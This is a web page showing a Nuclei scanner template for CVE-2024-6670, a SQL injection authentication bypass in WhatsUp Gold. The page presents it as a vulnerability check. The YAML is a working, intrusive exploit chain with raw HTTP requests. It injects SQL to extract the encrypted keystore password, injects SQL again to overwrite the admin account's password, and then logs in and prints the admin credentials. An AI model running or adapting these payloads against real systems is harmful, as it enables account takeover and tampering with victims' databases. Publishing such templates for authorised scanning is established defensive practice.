Skip to content
Nuclei Templates

WhatsUp Gold HasErrors SQL Injection - Authentication Bypass

ID: CVE-2024-6670

Severity: critical

Author: DhiyaneshDK,princechaddha

Tags: cve,cve2024,whatsup-gold,auth-bypass,sqli,intrusive,kev

Description

Section titled “Description”

In WhatsUp Gold versions released before 2024.0.0, a SQL Injection vulnerability allows an unauthenticated attacker to retrieve the users encrypted password.

YAML Source

Section titled “YAML Source”
id: CVE-2024-6670


info:
  name: WhatsUp Gold HasErrors SQL Injection - Authentication Bypass
  author: DhiyaneshDK,princechaddha
  severity: critical
  description: |
    In WhatsUp Gold versions released before 2024.0.0, a SQL Injection vulnerability allows an unauthenticated attacker to retrieve the users encrypted password.
  reference:
    - https://github.com/sinsinology/CVE-2024-6670
    - https://community.progress.com/s/article/WhatsUp-Gold-Security-Bulletin-August-2024
    - https://www.progress.com/network-monitoring
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-6670
    cwe-id: CWE-89
    epss-score: 0.00043
    epss-percentile: 0.09569
    cpe: cpe:2.3:a:progress:whatsup_gold:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    shodan-query: title:"WhatsUp Gold" http.favicon.hash:-2107233094
    product: whatsup_gold
    vendor: progress
  tags: cve,cve2024,whatsup-gold,auth-bypass,sqli,intrusive,kev


flow: |
  http(1);
  http(2);
  http(3);
  encryptedPassword = template.encryptedPassword
  const cleanedInput = encryptedPassword.replace('psyduck', '').match(/\d+/g);
  const hexValues = cleanedInput.map(value => {
    const num = parseInt(value);
    return isNaN(num) ? '00' : num.toString(16).padStart(2, '0');
  });
  log(hexValues);
  const hexString = hexValues.join('');
  const varbinaryString = '0x' + hexString;
  set("encryptedPassword", varbinaryString);
  http(4) && http(5);


variables:
  username: "admin"
  password: "{{to_lower(rand_text_alpha(8))}}"


http:
  - raw:
      - |
        POST /NmConsole/WugSystemAppSettings/JMXSecurity HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json


        {"KeyStorePassword": "{{password}}", "TrustStorePassword": "{{password}}"}


    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(set_cookie, 'ASP.NET_SessionId=')
        condition: and
        internal: true


  - raw:
      - |
        POST /NmConsole/Platform/PerformanceMonitorErrors/HasErrors HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json


        {"deviceId": "22222", "classId": "DF215E10-8BD4-4401-B2DC-99BB03135F2E';UPDATE ProActiveAlert SET sAlertName='psyduck'+( SELECT sValue FROM GlobalSettings WHERE sName = '_GLOBAL_:JavaKeyStorePwd');--", "range": "1", "n": "1", "start": "3", "end": "4", "businesdsHoursId": "5"}


    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(content_type, 'application/json')
        condition: and
        internal: true


  - raw:
      - |
        GET /NmConsole/Platform/Filter/AlertCenterItemsReportThresholds HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, 'DisplayName')
        condition: and
        internal: true


    extractors:
      - type: regex
        internal: true
        name: encryptedPassword
        regex:
          - '"psyduck\d+(,\d+)*"'


  - raw:
      - |
        POST /NmConsole/Platform/PerformanceMonitorErrors/HasErrors HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json


        {"deviceId": "22222", "classId": "DF215E10-8BD4-4401-B2DC-99BB03135F2E';UPDATE WebUser SET sPassword = {{encryptedPassword}} where sUserName = 'admin';--", "range": "1", "n": "1", "start": "3", "end": "4", "businesdsHoursId": "5"}


    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, 'false')
        condition: and
        internal: true


  - raw:
      - |
        POST /NmConsole/User/LoginAjax HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        username={{username}}&password={{password}}&rememberMe=false


    matchers:
      - type: word
        part: body
        words:
          - '"authenticated":true'
          - '"username":"'
        condition: and


    extractors:
      - type: dsl
        dsl:
          - '"USER: "+ username'
          - '"PASS: "+ password'
# digest: 4a0a00473045022075b4f7e1d456f4b504d32450755c486437677be47a320333c006a77a33dc568a022100bf0b73b40075e0195311daddd26bf8ea379d4322cce7576528e0b76e0f264e17:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-6670.yaml"

View on Github